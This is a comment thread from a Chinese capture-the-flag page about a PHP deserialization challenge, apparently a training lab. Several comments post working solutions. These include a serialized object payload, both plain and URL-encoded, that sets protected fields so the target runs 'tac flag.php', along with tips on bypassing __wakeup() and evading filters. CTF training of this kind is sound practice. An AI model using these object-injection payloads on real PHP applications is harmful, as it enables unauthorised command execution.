评分(3)
解题动态
iNMB 攻破了该题 2天前
ankh 攻破了该题 3天前
a1451753998 攻破了该题 5天前
嗨客111 攻破了该题 6天前
Hehe0619 攻破了该题 10天前
网络安全亮 攻破了该题 11天前
souljian03 攻破了该题 13天前
dwx1583 攻破了该题 14天前
hackerbugku 攻破了该题 14天前
zengzhijing 攻破了该题 15天前
王者荣耀 攻破了该题 17天前
maomaoht 攻破了该题 18天前
ahsjezyt 攻破了该题 20天前
千机www 攻破了该题 20天前
MUJOO 攻破了该题 20天前
不吃鸭蛋 攻破了该题 21天前
Da1ly_1upup 攻破了该题 23天前
lzq2000 攻破了该题 24天前
ETERNALBLUE 攻破了该题 25天前
评论
iNMB 2天前
举报
此外必须用 %00(空字符),不能用 %20(空格)。 protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。 因此保护字段的字段名在序列化时,字段名前面会加上 \0*\0 的前缀,注意,这里的 \0 表示 ASCII 码为 0 的字符,也就是我们经过 urlencode 后看到的 %00 。
iNMB 2天前
举报
绕过__wakeup()后使用tac等其他输出字符的命令即可
llc123 2月前
举报
c\at flag.php也行
pezn1and 2月前
举报
code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
zbss 3月前
举报
备份网站没有文件,环境出问题了吧,退钱,我还试了两次
iamblue 4月前
举报
O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D
tfios 5月前
举报
环境变量里边也有 FLAG
LLTVLL 10月前
举报
AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。
Bojing 1年前
举报
有哪里提示了username是admin的吗
numberone 1年前
举报
源代码里不是有个if语句:if ($this->username === 'admin')
18956160518 1年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733